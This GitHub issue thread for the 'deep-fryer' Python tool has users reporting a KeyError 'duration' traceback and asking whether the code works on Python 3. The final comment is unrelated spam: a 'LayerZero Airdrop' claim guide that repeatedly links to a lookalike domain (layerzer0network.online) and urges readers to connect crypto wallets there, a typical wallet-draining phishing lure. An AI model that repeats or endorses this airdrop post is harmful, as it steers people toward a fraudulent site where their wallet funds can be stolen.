### ISSUE TITLE
KeyError: 'duration'

### ISSUE THREAD

**Issue by wahooooooooooooooooooo** [mannynotfound/deep-fryer#3]
The program is not working. Im new to python so please dont hate.

`The process cannot access the file because it is being used by another process.
Traceback (most recent call last):
  File "deep-fryer.py", line 255, in <module>
    main(args.input_file, args.output_file, args.video_dip, args.audio_dip)
  File "deep-fryer.py", line 238, in main
    fried_video = deep_fry_video(input_file, video_dip)
  File "deep-fryer.py", line 214, in deep_fry_video
    emojified_video = add_random_emojis(input_file)
  File "deep-fryer.py", line 174, in add_random_emojis
    emoji_filters = create_emoji_filters(input_file)
  File "deep-fryer.py", line 117, in create_emoji_filters
    seconds = get_total_seconds(input_file)
  File "C:\Users\Sasha\Downloads\deep-fryer-master\utils.py", line 23, in get_total_seconds
    duration = deets['duration'].split(':')
KeyError: 'duration'`

**Comment by ghost** [comment]
I'm getting the same problem

**Comment by mdlp0716** [comment]
I am also getting the same problem

**Comment by mjanzetic** [comment]
Same. Is this code even Python 3 compatible?

**Comment by mdlp0716** [comment]
> Same. Is this code even Python 3 compatible?

Nope. I tried to fix it up for myself a while ago but it is a lot more screwed up than what I can fix. I forget if I tried running it with python 2.x though, maybe that works?

**Comment by earlyraven** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!
